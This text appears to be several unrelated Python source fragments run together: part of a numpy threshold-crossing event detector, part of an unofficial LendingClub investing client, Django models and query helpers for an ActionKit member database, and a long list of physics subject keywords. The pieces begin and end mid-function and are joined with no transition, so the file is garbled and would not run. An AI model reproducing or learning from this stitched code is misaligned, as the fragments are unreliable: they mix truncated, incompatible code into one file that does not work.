# TODO: ds is often used, but we have no default, and no check for when
# it is left as None.
# TODO: the Docstring should equally be improved.
x = x.squeeze()
if x.ndim > 1:
raise TypeError("multidimensional arrays not supported!")
if PrimaryThreshold is None: # by default, threshold is 3 SDs above mean of x
PrimaryThreshold = np.mean(x) + 3*np.std(x)
if SecondaryThreshold is None: # by default, revert back to mean of x
SecondaryThreshold = np.mean(x) # + 0*np.std(x)
events, _ = \
find_threshold_crossing_events(x=x,
threshold=PrimaryThreshold,
mode=mode)
# apply minThresholdLength criterion:
if minThresholdLength is not None and len(events) > 0:
durations = (events[:,1] - events[:,0] + 1) * ds
events = events[durations >= minThresholdLength]
if len(events) == 0:
bounds, maxes, events = [], [], []
logging.warning("no events satisfied criteria")
return bounds, maxes, events
# Find periods where value is > SecondaryThreshold; note that the previous periods should be within these!
if mode == 'above':
assert SecondaryThreshold <= PrimaryThreshold, \
"Secondary Threshold by definition should include more data than Primary Threshold"
elif mode == 'below':
assert SecondaryThreshold >= PrimaryThreshold, \
"Secondary Threshold by definition should include more data than Primary Threshold"
else:
raise NotImplementedError(
"mode {} not understood for find_threshold_crossing_events".format(str(mode)))
bounds, broader_maxes = \
find_threshold_crossing_events(x=x,
threshold=SecondaryThreshold,
mode=mode)
# Find corresponding big windows for potential events
# Specifically, look for closest left edge that is just smaller
outer_boundary_indices = np.searchsorted(bounds[:,0], events[:,0], side='right')
# searchsorted finds the index after, so subtract one to get index before
outer_boundary_indices = outer_boundary_indices - 1
# Find extended boundaries for events by pairing to larger windows
# (Note that there may be repeats if the larger window contains multiple > 3SD sections)
bounds = bounds[outer_boundary_indices,:]
maxes = broader_maxes[outer_boundary_indices]
if minLength is not None and len(events) > 0:
durations = (bounds[:,1] - bounds[:,0] + 1) * ds
# TODO: refactor [durations <= maxLength] but be careful
json_response = response.json()
if self.session.json_success(json_response):
results = json_response['searchresult']
# Normalize results by converting loanGUID -> loan_id
for loan in results['loans']:
loan['loan_id'] = int(loan['loanGUID'])
# Validate that fractions do indeed match the filters
if filters is not None:
filters.validate(results['loans'])
return results
return False
def build_portfolio(self, cash, max_per_note=25, min_percent=0, max_percent=20, filters=None, automatically_invest=False, do_not_clear_staging=False):
"""
Returns a list of loan notes that are diversified by your min/max percent request and filters.
One way to invest in these loan notes, is to start an order and use add_batch to add all the
loan fragments to them. (see examples)
Parameters
----------
cash : int
The total amount you want to invest across a portfolio of loans (at least $25).
max_per_note : int, optional
The maximum dollar amount you want to invest per note. Must be a multiple of 25
min_percent : int, optional
THIS IS NOT PER NOTE, but the minimum average percent of return for the entire portfolio.
max_percent : int, optional
THIS IS NOT PER NOTE, but the maximum average percent of return for the entire portfolio.
filters : lendingclub.filters.*, optional
The filters to use to search for portfolios
automatically_invest : boolean, optional
If you want the tool to create an order and automatically invest in the portfolio that matches your filter.
(default False)
do_not_clear_staging : boolean, optional
Similar to automatically_invest, don't do this unless you know what you're doing.
Setting this to True stops the method from clearing the loan staging area before returning
Returns
-------
dict
A dict representing a new portfolio or False if nothing was found.
If `automatically_invest` was set to `True`, the dict will contain an `order_id` key with
the ID of the completed investment order.
Notes
-----
**The min/max_percent parameters**
When searching for portfolios, these parameters will match a portfolio of loan notes which have
an **AVERAGE** percent return between these values. If there are multiple portfolio matches, the
one closest to the max percent will be chosen.
Examples
--------
Here we want to invest $400 in a portfolio with only B, C, D and E grade notes with an average overall return between 17% - 19%. This is similar to finding a portfolio in the 'Invest' section on lendingclub.com::
>>> from lendingclub import LendingClub
>>> from lendingclub.filters import Filter
>>> lc = LendingClub()
>>> lc.authenticate()
Email:<EMAIL>
Password:
True
>>> filters = Filter() # Set the search filters (only B, C, D and E grade notes)
>>> filters['grades']['B'] = True
>>> filters['grades']['C'] = True
>>> filters['grades']['D'] = True
>>> filters['grades']['E'] = True
>>> lc.get_cash_balance() # See the cash you have available for investing
463.80000000000001
>>> portfolio = lc.build_portfolio(400, # Invest $400 in a portfolio...
min_percent=17.0, # Return percent average between 17 - 19%
max_percent=19.0,
max_per_note=50, # As much as $50 per note
filters=filters) # Search using your filters
>>> len(portfolio['loan_fractions']) # See how many loans are in this portfolio
16
>>> loans_notes = portfolio['loan_fractions']
>>> order = lc.start_order() # Start a new order
>>> order.add_batch(loans_notes) # Add the loan notes to the order
>>> order.execute() # Execute the order
1861880
Here we do a similar search, but automatically invest the found portfolio. **NOTE** This does not allow
you to review the portfolio before you invest in it.
>>> from lendingclub import LendingClub
>>> from lendingclub.filters import Filter
>>> lc = LendingClub()
>>> lc.authenticate()
Email:<EMAIL>
Password:
True
# Filter shorthand
>>> filters = Filter({'grades': {'B': True, 'C': True, 'D': True, 'E': True}})
>>> lc.get_cash_balance() # See the cash you have available for investing
463.80000000000001
>>> portfolio = lc.build_portfolio(400,
min_percent=17.0,
max_percent=19.0,
max_per_note=50,
filters=filters,
automatically_invest=True) # Same settings, except invest immediately
>>> portfolio['order_id'] # See order ID
1861880
"""
assert filters is None or isinstance(filters, Filter), 'filter is not a lendingclub.filters.Filter'
assert max_per_note >= 25, 'max_per_note must be greater than or equal to 25'
# Set filters
if filters:
filter_str = filters.search_string()
else:
filter_str = 'default'
# Start a new order
self.session.clear_session_order()
# Make request
payload = {
'amount': cash,
'max_per_note': max_per_note,
'filter': filter_str
}
self.__log('POST VALUES -- amount: {0}, max_per_note: {1}, filter: ...'.format(cash, max_per_note))
response = self.session.post('/portfolio/lendingMatchOptionsV2.action', data=payload)
json_response = response.json()
# Options were found
if self.session.json_success(json_response) and 'lmOptions' in json_response:
options = json_response['lmOptions']
# Nothing found
if type(options) is not list or json_response['numberTicks'] == 0:
self.__log('No lending portfolios were returned with your search')
return False
# Choose an investment option based on the user's min/max values
i = 0
match_index = -1
match_option = None
for option in options:
# A perfect match
if option['percentage'] == max_percent:
match_option = option
match_index = i
break
# Over the max
elif option['percentage'] > max_percent:
break
# Higher than the minimum percent and the current matched option
elif option['percentage'] >= min_percent and (match_option is None or match_option['percentage'] < option['percentage']):
match_option = option
match_index = i
i += 1
# Nothing matched
if match_option is None:
self.__log('No portfolios matched your percentage requirements')
return False
# Mark this portfolio for investing (in order to get a list of all notes)
payload = {
'order_amount': cash,
'lending_match_point': match_index,
'lending_match_version': 'v2'
}
self.session.get('/portfolio/recommendPortfolio.action', query=payload)
# Get all loan fractions
payload = {
'method': 'getPortfolio'
}
response = self.session.get('/data/portfolio', query=payload)
json_response = response.json()
# Extract fractions from response
fractions = []
if 'loanFractions' in json_response:
fractions = json_response['loanFractions']
# Normalize by converting loanFractionAmount to invest_amount
for frac in fractions:
frac['invest_amount'] = frac['loanFractionAmount']
# Raise error if amount is greater than max_per_note
if frac['invest_amount'] > max_per_note:
raise LendingClubError('ERROR: LendingClub tried to invest ${0} in a loan note. Your max per note is set to ${1}. Portfolio investment canceled.'.format(frac['invest_amount'], max_per_note))
if len(fractions) == 0:
self.__log('The selected portfolio didn\'t have any loans')
return False
match_option['loan_fractions'] = fractions
# Validate that fractions do indeed match the filters
if filters is not None:
filters.validate(fractions)
# Not investing -- reset portfolio search session and return
if automatically_invest is not True:
if do_not_clear_staging is not True:
self.session.clear_session_order()
# Invest in this portfolio
elif automatically_invest is True: # just to be sure
order = self.start_order()
# This should probably only be ever done here...ever.
order._Order__already_staged = True
order._Order__i_know_what_im_doing = True
order.add_batch(match_option['loan_fractions'])
order_id = order.execute()
match_option['order_id'] = order_id
return match_option
else:
raise LendingClubError('Could not find any portfolio options that match your filters', response)
return False
def my_notes(self, start_index=0, limit=100, get_all=False, sort_by='loanId', sort_dir='asc'):
"""
Return all the loan notes you've already invested in. By default it'll return 100 results at a time.
Parameters
----------
start_index : int, optional
The result index to start on. By default only 100 records will be returned at a time, so use this
to start at a later index in the results. For example, to get results 200 - 300, set `start_index` to 200.
(default is 0)
limit : int, optional
The number of results to return per request. (default is 100)
get_all : boolean, optional
Return all results in one request, instead of 100 per request.
sort_by : string, optional
What key to sort on
sort_dir : {'asc', 'desc'}, optional
Which direction to sort
Returns
-------
dict
A dictionary with a list of matching notes on the `loans` key
"""
index = start_index
notes = {
'loans': [],
'total': 0,
'result': 'success'
}
while True:
payload = {
'sortBy': sort_by,
'dir': sort_dir,
'startindex': index,
'pagesize': limit,
'namespace': '/account'
}
response = self.session.post('/account/loansAj.action', data=payload)
json_response = response.json()
# Notes returned
if self.session.json_success(json_response):
notes['loans'] += json_response['searchresult']['loans']
notes['total'] = json_response['searchresult']['totalRecords']
# Error
else:
notes['result'] = json_response['result']
break
# Load more
if get_all is True and len(notes['loans']) < notes['total']:
index += limit
# End
else:
break
return notes
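# Illustrative usage (requires an authenticated session; the credentials below are
# placeholders in the same style as the docstrings above):
#
#     lc = LendingClub(email='<EMAIL>', password='<PASSWORD>')
#     lc.authenticate()
#     notes = lc.my_notes(get_all=True, sort_by='loanId', sort_dir='asc')
#     print(notes['total'], len(notes['loans']))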
def get_note(self, note_id):
"""
Get a loan note that you've invested in by ID
Parameters
----------
note_id : int
The note ID
Returns
-------
dict
A dictionary representing the matching note or False
Examples
--------
>>> from lendingclub import LendingClub
>>> lc = LendingClub(email='<EMAIL>', password='<PASSWORD>')
>>> lc.authenticate()
True
>>> notes = lc.my_notes()
qs.query.group_by = [x.name for x in CoreUser._meta.local_fields]
qs.query.add_annotation(models.Count('actions__customfields__value'), 'actionval_count', is_summary=False)
xtrawhere = HavingGroupCondition(['count(DISTINCT {}.value, core_user.id) >= %s'.format(actionfield_alias)], (min_count,))
qs.query.where.add(xtrawhere, AND)
where2 = ExtraWhere(["{af}.name = %s".format(af=actionfield_alias)],(actionfield_name,))
qs.query.where.add(where2, AND)
if actionfield_value:
where3 = ExtraWhere(["{af}.value = %s".format(af=actionfield_alias)],(actionfield_value,))
qs.query.where.add(where3, AND)
if pages:
qs = qs.extra(where=['{}.page_id IN %s'.format(actionalias)], params=[pages])
if since_days:
since = timezone.now() - datetime.timedelta(days=since_days)
qs = qs.extra(where=['{}.created_at > %s'.format(actionalias)], params=[since])
#print('sql query', qs.query.sql_with_params()) #what SQL will we run?
return qs
@classmethod
def userfield_filter(cls, qs, userfield_name, userfield_value=None, min_count=1, search=False):
# note this is tweaked from the method above action_counts_filter
# min_count is *mostly* useless, but i think it does actually store multiple user values occasionally, or always.
#args for join: table_name, parent_alias, table_alias, join_type, join_field, nullable
uf_alias = qs.query.join(Join('core_userfield', qs.query.get_initial_alias(), 'core_userfield', INNER,
CoreUser._meta.fields_map['customfields'], False))
#group by everything except our aggregate annotation
# this is generically problematic, because if we need to group by other things,
# then this will fail
qs.query.group_by = [x.name for x in CoreUser._meta.local_fields]
qs.query.add_annotation(models.Count('customfields__name'), 'uf_count', is_summary=False)
xtrawhere = HavingGroupCondition(['count(DISTINCT {}.value, core_user.id) >= %s'.format(uf_alias)], (min_count,))
qs.query.where.add(xtrawhere, AND)
where2 = ExtraWhere(["{uf}.name = %s".format(uf=uf_alias)],(userfield_name,))
qs.query.where.add(where2, AND)
if userfield_value:
op = '=' if not search else 'LIKE'
where3 = ExtraWhere(["{uf}.value {op} %s".format(uf=uf_alias, op=op)],(userfield_value,))
qs.query.where.add(where3, AND)
#print('sql query', qs.query.sql_with_params()) #what SQL will we run?
return qs
@classmethod
def add_location_to_queryset(cls, qs):
"""
Joins core_location to the query
"""
qa = qs.query.join(Join('core_location', qs.query.get_initial_alias(), 'core_location', LOUTER,
CoreUser._meta.fields_map['location'], True))
qs = qs.extra(select={
'us_district': '{qa}.us_district'.format(qa=qa),
})
return qs
@classmethod
def add_phone_to_queryset(cls, qs, no_groupby=False):
"""
Adds the first phone number to the queryset (probably MySQL dependent on first-row no-fussing)
"""
phone_alias = qs.query.join(Join('core_phone', qs.query.get_initial_alias(), 'core_phone', LOUTER,
CoreUser._meta.fields_map['phones'], True))
if not no_groupby:
#group by everything except our aggregate annotation (bad general assumption)
qs.query.group_by = [x.name for x in CoreUser._meta.local_fields]
qs = qs.extra(select={
'first_phone': '%s.normalized_phone' % phone_alias,
'first_phone_type': '%s.type' % phone_alias,
'first_phone_source': '%s.source' % phone_alias,
})
return qs
@classmethod
def add_userfield_to_queryset(cls, qs, userfieldname, userfieldvalue=None):
"""
Adds a userfield to a user queryset, possibly conditional on userfieldvalue
"""
#args for join: table_name, parent_alias, table_alias, join_type, join_field, nullable
uf_alias = qs.query.join(Join('core_userfield', qs.query.get_initial_alias(), 'core_userfield', LOUTER,
JoinField(CoreUser._meta.fields_map['customfields'], userfieldname, customval=userfieldvalue), True))
userattr = 'userfield_%s' % userfieldname
qs = qs.extra(select={userattr: '%s.value' % uf_alias})
return qs
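# Illustrative usage sketch (the userfield name 'zipcode' is a hypothetical example):
#
#     qs = CoreUser.objects.all()
#     qs = CoreUser.objects.add_userfield_to_queryset(qs, 'zipcode')
#     for user in qs[:10]:
#         print(user.email, user.userfield_zipcode)  # value selected via the LEFT JOIN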
@classmethod
def add_usergeofield_to_queryset(cls, qs, userfieldname, userfieldvalue=None):
"""
Adds a usergeofield to a user queryset, possibly conditional on userfieldvalue
"""
#args for join: table_name, parent_alias, table_alias, join_type, join_field, nullable
uf_alias = qs.query.join(Join('core_usergeofield', qs.query.get_initial_alias(), 'core_usergeofield', LOUTER,
JoinField(CoreUser._meta.fields_map['customfields'], userfieldname, customval=userfieldvalue), True))
userattr = 'usergeofield_%s' % userfieldname
qs = qs.extra(select={userattr: '%s.value' % uf_alias})
return qs
@classmethod
def action_value_filter(cls, qs, fieldname, min_count=1, since_days=None):
return qs
class CoreUser(_akit_model):
objects = CoreUserManager()
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
email = models.TextField(max_length=765, unique=True)
prefix = models.CharField(max_length=765)
first_name = models.CharField(max_length=765)
middle_name = models.CharField(max_length=765)
last_name = models.CharField(max_length=765)
suffix = models.CharField(max_length=765)
password = models.CharField(max_length=765)
subscription_status = models.CharField(max_length=765)
address1 = models.CharField(max_length=765)
address2 = models.CharField(max_length=765)
city = models.CharField(max_length=765)
state = models.CharField(max_length=765)
region = models.CharField(max_length=765)
postal = models.CharField(max_length=765)
zip = models.CharField(max_length=15)
plus4 = models.CharField(max_length=12)
country = models.CharField(max_length=765)
source = models.CharField(max_length=765)
lang = models.ForeignKey('CoreLanguage', null=True, blank=True, on_delete=models.DO_NOTHING)
rand_id = models.IntegerField()
# This allows filter queries like this:
# CoreUser.objects.filter(zipproximity__nearby='10025', zipproximity__distance__lte=5)
zipproximity = models.ForeignObject('ZipProximity', on_delete=models.DO_NOTHING,
from_fields=['zip'], to_fields=['zip'],
related_name='user')
# Return Fields As A Dictionary
def custom_fields(self):
fields = {}
for x in CoreUserfield.objects.filter(parent_id=self):
fields[x.name_id] = x.value
return fields
# Return Userfields As A Queryset
def fields(self):
return CoreUserfield.objects.filter(parent_id=self)
def actions(self):
return CoreAction.objects.select_related().filter(user_id=self)
def __str__(self):
return u'%s %s' % (self.first_name, self.last_name)
def recent_phone(self):
# gets the most recent phone number and formats it to be readable
return getattr(self.phones.order_by('-updated_at').first(), 'normalized_phone', None)
class Meta(_akit_model.Meta):
db_table = 'core_user'
verbose_name_plural = 'Member Search'
permissions = (
("csvswap", "Use CSV Swap to get member data"),
)
def api_save(self, **kwargs):
class aksettings:
AK_USER = settings.AK_USER
AK_PASSWORD = settings.AK_PASSWORD
AK_BASEURL = settings.AK_BASEURL
DEBUG = False
akapi = AKUserAPI(aksettings)
if kwargs:
if self.id:
res = akapi.update_user(self.id, kwargs)
elif 'email' in kwargs:
res = akapi.create_user(kwargs)
class CoreUserfield(_akit_model):
parent = models.ForeignKey('CoreUser', related_name='customfields', on_delete=models.DO_NOTHING)
name = models.CharField(max_length=765)
value = models.CharField(max_length=65535)
class Meta(_akit_model.Meta):
db_table = u'core_userfield'
def __str__(self):
return self.value
def api_save(self, **kwargs):
class aksettings:
AK_USER = settings.AK_USER
AK_PASSWORD = settings.AK_PASSWORD
AK_BASEURL = settings.AK_BASEURL
DEBUG = False
akapi = AKUserAPI(aksettings)
res = akapi.set_usertag(self.parent_id, {self.name: self.value})
class CoreUsermailing(_akit_model):
mailing = models.ForeignKey('CoreMailing', on_delete=models.DO_NOTHING)
user = models.ForeignKey('CoreUser', on_delete=models.DO_NOTHING)
subject = models.ForeignKey('CoreMailingsubject', null=True, blank=True, on_delete=models.DO_NOTHING)
created_at = models.DateTimeField()
class Meta(_akit_model.Meta):
db_table = u'core_usermailing'
class CoreUseroriginal(_akit_model):
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
user = models.OneToOneField('CoreUser', primary_key=True, on_delete=models.DO_NOTHING)
address1 = models.CharField(max_length=765)
address2 = models.CharField(max_length=765)
city = models.CharField(max_length=765)
state = models.CharField(max_length=765)
zip = models.CharField(max_length=765)
address1_updated_at = models.DateTimeField(null=True, blank=True)
address2_updated_at = models.DateTimeField(null=True, blank=True)
city_updated_at = models.DateTimeField(null=True, blank=True)
state_updated_at = models.DateTimeField(null=True, blank=True)
zip_updated_at = models.DateTimeField(null=True, blank=True)
class Meta(_akit_model.Meta):
db_table = u'core_useroriginal'
class CoreUserupdateaction(CoreAction):
action = models.OneToOneField(CoreAction, parent_link=True, db_column='action_ptr_id', on_delete=models.DO_NOTHING)
class Meta(_akit_model.Meta):
db_table = u'core_userupdateaction'
class CoreUserupdatepage(CorePage):
page = models.OneToOneField(CorePage, parent_link=True, db_column='page_ptr_id', on_delete=models.DO_NOTHING)
class Meta(_akit_model.Meta):
db_table = u'core_userupdatepage'
class CoreZp4Queue(_akit_model):
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
user = models.ForeignKey('CoreUser', on_delete=models.DO_NOTHING)
class Meta(_akit_model.Meta):
db_table = u'core_zp4queue'
class DjangoAdminLog(_akit_model):
action_time = models.DateTimeField()
user = models.ForeignKey('AuthUser', on_delete=models.DO_NOTHING)
content_type = models.ForeignKey('DjangoContentType', null=True, blank=True, on_delete=models.DO_NOTHING)
object_id = models.TextField(blank=True)
object_repr = models.CharField(max_length=600)
action_flag = models.IntegerField()
change_message = models.TextField()
class Meta(_akit_model.Meta):
db_table = u'django_admin_log'
class DjangoContentType(_akit_model):
name = models.CharField(max_length=300)
app_label = models.TextField(max_length=300, unique=True)
model = models.TextField(max_length=300, unique=True)
class Meta(_akit_model.Meta):
db_table = u'django_content_type'
class DjangoSession(_akit_model):
session_key = models.CharField(max_length=120, primary_key=True)
session_data = models.TextField()
expire_date = models.DateTimeField()
class Meta(_akit_model.Meta):
db_table = u'django_session'
class EventsCampaign(_akit_model):
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
title = models.CharField(max_length=765)
name = models.TextField(max_length=765, unique=True)
public_create_page = models.IntegerField()
use_title = models.IntegerField()
default_title = models.CharField(max_length=765)
starts_at = models.DateTimeField(null=True, blank=True)
use_start_date = models.IntegerField()
use_start_time = models.IntegerField()
require_staff_approval = models.IntegerField()
require_email_confirmation = models.IntegerField()
allow_private = models.IntegerField()
max_event_size = models.IntegerField(null=True, blank=True)
default_event_size = models.IntegerField(null=True, blank=True)
public_search_page = models.IntegerField()
show_title = models.IntegerField()
show_venue = models.IntegerField()
show_address1 = models.IntegerField()
show_city = models.IntegerField()
show_state = models.IntegerField()
show_zip = models.IntegerField()
show_public_description = models.IntegerField()
show_directions = models.IntegerField()
show_attendee_count = models.IntegerField()
class Meta(_akit_model.Meta):
db_table = u'events_campaign'
verbose_name_plural = 'Event Campaigns'
ordering = ['-id'] #so recent campaigns are shown first
def __str__(self):
return '%s %s' % (
self.title,
self.starts_at.strftime('%m/%d/%y') if self.starts_at else '')
class EventsEventManager(models.Manager):
def public_search(self):
return self.__class__.filter_public_search(self.get_queryset())
@classmethod
def filter_public_search(cls, qs, allow_full=False):
query = qs.filter(is_private=0,
status="active",
host_is_confirmed=1
)
if not allow_full:
query = query.extra(where=['max_attendees > attendee_count'])
return query
@classmethod
def add_eventfield_to_queryset(cls, qs, fieldname, filtervalue=None):
"""
Adds an events_eventfield value (and its id) to the queryset, optionally filtered on its value
"""
#args for join: table_name, parent_alias, table_alias, join_type, join_field, nullable
query_alias = qs.query.join(Join('events_eventfield', qs.query.get_initial_alias(), 'events_eventfield', LOUTER,
JoinField(EventsEvent._meta.fields_map['customfields'], fieldname), True))
#group by everything except our aggregate annotation (bad general assumption)
qs.query.group_by = [x.name for x in EventsEvent._meta.local_fields]
if filtervalue:
where = "{qa}.value = %s"
qs.query.where.add(ExtraWhere([where.format(qa=query_alias)], [filtervalue]), AND)
fieldname_id = '%s_id' % fieldname
qs = qs.extra(select={
fieldname: '%s.value' % query_alias,
fieldname_id: '%s.id' % query_alias,
})
return qs
@classmethod
def add_creator_userfield_to_queryset(cls, qs, userfieldname):
"""
Adds the event creator's core_userfield value to the queryset
"""
#args for join: table_name, parent_alias, table_alias, join_type, join_field, nullable
uf_alias = qs.query.join(Join('core_userfield', qs.query.get_initial_alias(), 'core_userfield', LOUTER,
JoinField(CoreUser._meta.fields_map['customfields'], userfieldname,
cols=(('creator_id', 'parent_id'),)
), True))
userattr = 'userfield_%s' % userfieldname
qs = qs.extra(select={userattr: '%s.value' % uf_alias})
return qs
@classmethod
def filter_proximity(cls, qs, zip, radius, same_state=False):
"""
Joins on ZipProximity and then filters on radius
"""
#args for join: table_name, parent_alias, table_alias, join_type, join_field, nullable
query_alias = ZipJoin.add_to_queryset(qs)
qs.query.where.add(ExtraWhere(
['{qa}.nearby=%s AND {qa}.distance < %s AND {qa}.same_state IN %s'.format(qa=query_alias)],
[zip, radius, ( (True,) if same_state else (True, False))]
), AND)
qs = qs.extra(select={
'distance': '%s.distance' % query_alias,
'same_state': '%s.same_state' % query_alias,
})
return qs
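# Illustrative usage sketch (the zip code is a hypothetical example; radius units
# depend on how ZipProximity.distance was populated):
#
#     qs = EventsEvent.objects.public_search()
#     qs = EventsEventManager.filter_proximity(qs, zip='10025', radius=25)
#     for event in qs.order_by('distance')[:5]:
#         print(event.title, event.distance, event.same_state)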
class EventsEvent(_akit_model):
objects = EventsEventManager()
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
address1 = models.CharField(max_length=765)
address2 = models.CharField(max_length=765)
city = models.CharField(max_length=765)
state = models.CharField(max_length=765)
region = models.CharField(max_length=765)
postal = models.CharField(max_length=765)
zip = models.CharField(max_length=15)
plus4 = models.CharField(max_length=12)
country = models.CharField(max_length=765)
longitude = models.FloatField(null=True, blank=True)
latitude = models.FloatField(null=True, blank=True)
us_district = models.CharField(max_length=5, verbose_name="US district",
db_index=True)
campaign = models.ForeignKey('EventsCampaign', related_name='events', on_delete=models.DO_NOTHING)
title = models.CharField(max_length=765)
creator = models.ForeignKey('CoreUser', on_delete=models.DO_NOTHING)
starts_at = models.DateTimeField(null=True, blank=True)
ends_at = models.DateTimeField(null=True, blank=True)
starts_at_utc = models.DateTimeField(null=True, blank=True)
ends_at_utc = models.DateTimeField(null=True, blank=True)
status = models.CharField(max_length=96, choices=(('active', 'active'),
('cancelled', 'cancelled'),
('deleted', 'deleted'),
))
host_is_confirmed = models.IntegerField()
is_private = models.IntegerField(choices=((0, 'public'), (1, 'private')),
verbose_name="private or public")
is_approved = models.IntegerField()
attendee_count = models.IntegerField()
Reissner-Nordstroem",
u"Coulomb",
u"form factor: vector",
u"anti-p p: scattering",
u"fusion",
u"quantum molecular dynamics: relativistic",
u"charmed meson",
u"calorimeter: hadronic",
u"nuclear matter: density",
u"Borel transformation",
u"compactification: torus",
u"photon nucleus: nuclear reaction",
u"field theory: scalar: massless",
u"temperature: transition",
u"gravitational radiation: particle source",
u"quark antiquark: bound state",
u"neutrino/tau",
u"space-time: fluctuation",
u"D*(2010): hadronic decay",
u"KLOE",
u"pi: production",
u"pi pi: elastic scattering",
u"anomaly: U(1)",
u"electron: electric moment",
u"meson: heavy",
u"alignment",
u"Slavnov identity",
u"minimal supersymmetric standard model: parameter space",
u"electron p: inelastic scattering",
u"beam dynamics",
u"modular",
u"gluon: polarization",
u"pseudoscalar meson: mass",
u"fabrication",
u"B+: hadronic decay",
u"atmosphere",
u"approximation: nonrelativistic",
u"absorption",
u"field theory: relativistic",
u"spin: orbit",
u"particle: acceleration",
u"hadron: mass",
u"axion: mass",
u"electromagnetic field: nonlinear",
u"ladder approximation",
u"splitting",
u"Higgs model: composite",
u"loop integral",
u"electronics",
u"readout",
u"flavor: dependence",
u"lepton: flavor",
u"expansion: strong coupling",
u"vector meson: photoproduction",
u"R-matrix",
u"compactification: orbifold",
u"Becchi-Rouet-Stora",
u"mass: twist",
u"J/psi(3100): hadronic decay",
u"black string",
u"dilepton: mass spectrum",
u"lepton: mixing",
u"decay modes",
u"chargino",
u"hydrogen",
u"<NAME>",
u"galaxy: rotation",
u"constraint: Hamiltonian",
u"radiation: electromagnetic",
u"black hole: hair",
u"gauge boson: pair production",
u"approximation: classical",
u"lepton nucleus: deep inelastic scattering",
u"track data analysis: vertex",
u"top: hadroproduction",
u"interpretation of experiments: CERN LEP Stor",
u"fermion: massive",
u"symmetry: crossing",
u"phase: topological",
u"specific heat",
u"mass: correction",
u"fermion: condensation",
u"fragmentation",
u"Schwinger model",
u"Skyrmion",
u"gluon: jet",
u"turbulence",
u"radiation",
u"quantum geometry",
u"Fermi gas",
u"gravitation: scalar",
u"W: hadronic decay",
u"space-time: foam",
u"low-energy constant",
u"current: axial",
u"bispectrum",
u"model: fluid",
u"quark: jet",
u"dark matter: coupling",
u"optics",
u"tau: decay",
u"photon p: inclusive reaction",
u"muon",
u"pi: exchange",
u"hyperon",
u"boson: statistics",
u"tau: radiative decay",
u"nucleon: model",
u"photon: structure function",
u"inflation: slow-roll approximation",
u"spin: 3/2",
u"color: confinement",
u"diquark: condensation",
u"gravitation: linear",
u"operator: local",
u"p: polarized target",
u"reflection",
u"string: topological",
u"superconductivity: color",
u"CLAS",
u"neutrino: superluminal",
u"gravitation: correction",
u"liquid",
u"muon: leptonic decay",
u"coupling: anomaly",
u"PCAC model",
u"mediation",
u"cross section: elastic scattering",
u"photon photon: scattering",
u"slepton: mass",
u"black hole: static",
u"collective",
u"final state: two-photon",
u"special relativity",
u"binary: coalescence",
u"cosmic radiation: propagation",
u"hybrid",
u"scalar: Ricci",
u"psi(3685)",
u"Mellin transformation",
u"Bogolyubov transformation",
u"color flavor locked phase",
u"solution: static",
u"gauge: abelian",
u"beam emittance",
u"cross section: measured",
u"quantum chromodynamics: light cone",
u"nuclear properties",
u"sparticle: pair production",
u"cosmic radiation: diffusion",
u"air",
u"statistical analysis: Bayesian",
u"gravitation: interaction",
u"amplitude analysis: decay",
u"field theory: Toda",
u"quark model: constituent",
u"ionization: yield",
u"field theory: massive",
u"stop: mass",
u"CERN CLIC",
u"J/psi(3100): electroproduction",
u"quark: hadroproduction",
u"neutrino electron: elastic scattering",
u"mass: screening",
u"annihilation",
u"a0(980)",
u"charmed meson: hadronic decay",
u"J/psi(3100): yield",
u"beam: energy",
u"multiplet: chiral",
u"p: spin",
u"mass: scalar",
u"quark model: chiral",
u"contact interaction",
u"epsilon expansion",
u"neutrino",
u"space-time: deformation",
u"symmetry breaking: flavor",
u"string model: Type IIB",
u"DELPHI",
u"correction: finite size",
u"neutrino nucleus: interaction",
u"gravitation: teleparallel",
u"fermion: dark matter",
u"energy: kinetic",
u"scaling: invariance",
u"crossing",
u"mass ratio",
u"electron nucleus: deep inelastic scattering",
u"neutrino nucleus: nuclear reaction",
u"inflaton: decay",
u"particle: spectrum",
u"gravitational radiation: background",
u"scale: grand unified theory",
u"elastic scattering",
u"quark: potential",
u"matter: power spectrum",
u"benchmark",
u"adiabatic",
u"muon: branching ratio",
u"path integral: measure",
u"hydrogen: atom",
u"lepton: branching ratio",
u"WIMP nucleus: elastic scattering",
u"MAGIC",
u"gauge field theory: tensor",
u"singlet",
u"Bayesian",
u"RF system",
u"computer: network",
u"mass: renormalization",
u"differential forms: 3",
u"fermion: coupling",
u"Regge",
u"small-angle",
u"precision measurement",
u"dark matter: scalar",
u"differential forms: symplectic",
u"fractal",
u"Cherenkov Telescope Array",
u"inflation: chaos",
u"quantum space",
u"dark matter: detector",
u"form factor: Sudakov",
u"dimension: 8",
u"p: lifetime",
u"hadron: multiplicity",
u"group: SU(2)",
u"beam monitoring",
u"particle: spin",
u"quantization: Batalin-Vilkovisky",
u"supersymmetry: minimal",
u"cohomology: Becchi-Rouet-Stora",
u"hydrodynamics: relativistic",
u"model: spin",
u"momentum transfer",
u"star: mass",
u"analyzing power",
u"baryon resonance: exotic",
u"new particle",
u"chameleon",
u"quark: mixing",
u"X-ray: emission",
u"nuclear force",
u"pi0: photoproduction",
u"accretion",
u"mass: scale",
u"potential: vector",
u"graviton: massive",
u"xenon: liquid",
u"quantization: deformation",
u"saddle-point approximation",
u"cosmic background radiation: polarization",
u"mathematical methods: variational",
u"photon: propagator",
u"jet: energy",
u"magnetic spectrometer",
u"bottom: mass",
u"sfermion: mass",
u"graviton: mass",
u"nuclear emulsion",
u"mass: gravitation",
u"sparticle: decay",
u"energy: gap",
u"electron nucleus: nuclear reaction",
u"formation",
u"underlying event",
u"tritium: semileptonic decay",
u"invariance: Poincare",
u"isometry",
u"group theory: geometrical",
u"deuterium",
u"hadron: mass spectrum",
u"charge conjugation",
u"error: statistical",
u"singlet: scalar",
u"K: rare decay",
u"multiplicity: fluctuation",
u"potential: gauge",
u"black hole: Kerr-Newman",
u"constraint: algebra",
u"J/psi(3100): radiative decay",
u"Phi(1020): hadronic decay",
u"Immirzi parameter",
u"beryllium",
u"electron: capture",
u"L3",
u"neutrino: path length",
u"graviton: exchange",
u"fractional",
u"vector meson: electroproduction",
u"p nucleus: interaction",
u"mass number: dependence",
u"space-time: static",
u"sphaleron",
u"quark: semileptonic decay",
u"neutrino/mu: beam",
u"showers: atmosphere",
u"standard model: validity test",
u"power spectrum: tensor",
